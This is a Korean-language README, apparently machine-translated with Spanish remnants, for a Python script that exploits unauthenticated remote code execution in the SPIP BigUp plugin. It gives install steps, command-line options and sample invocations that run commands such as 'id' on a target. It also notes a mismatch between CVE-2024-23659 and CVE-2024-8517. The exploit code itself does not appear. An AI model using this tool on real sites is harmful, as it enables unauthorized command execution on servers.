
기본 python3 의존성을 사용하는 SPIP (CVE-2024-23659) 스크립트
SPIP BigUp 비인증 RCE 검증/익스플로잇용 Python 3 스크립트 (현재 코드 기준, 운영 참조는 CVE-2024-8517).
⚠️ 중요 참고: 저장소 이름에는
CVE-2024-23659이 언급되어 있지만, 스크립트(cve.py)와 내부 메시지는CVE-2024-8517을 참조합니다.
기술적 혼란을 피하기 위해 이 부분을 검토하고 통일하세요.
cve.py는 다음을 자동화합니다:
formulaire_action 및 formulaire_action_args) 발견.X-Command-Output 헤더(base64)를 통한 출력 읽기.requestsbeautifulsoup4설치:
pip install requests beautifulsoup4
python3 cve.py -h
-u, --url (필수): 대상의 기본 URLhttp://web.prod.local-c, --command: 단일 명령을 실행하고 종료--proxy: HTTP/HTTPS 프록시 (예: http://127.0.0.1:8080)--timeout: HTTP 타임아웃(초) (기본값: 10)-v, --verbose: 요청 세부 정보 표시python3 cve.py -u http://objetivo.local
python3 cve.py -u http://objetivo.local -c "id"
python3 cve.py -u http://objetivo.local --proxy http://127.0.0.1:8080 -v
python3 cve.py -u http://objetivo.local --timeout 20
Objetivo vulnerable. Usuario web: <usuario>와 같은 메시지가 표시됩니다.-v를 사용하여 HTTP 세부 정보를 확인해 보세요.X-Command-Output이 표시되지 않음
--timeout을 늘리세요.이 저장소와 그 내용은 교육, 연구 및 승인된 테스트 목적으로만 제공됩니다.
명시적 승인 없이 시스템에 이 소프트웨어를 사용하는 것은 불법이며 범죄에 해당할 수 있습니다.
저자와 기여자는 이 도구로 인한 손상, 서비스 중단, 데이터 손실, 법적 책임 또는 이 도구의 사용으로 인한 어떠한 오용에 대해서도 책임을 지지 않습니다.
이 코드를 사용함으로써 다음 사항에 동의합니다:
승인되지 않은 경우 사용하지 마세요.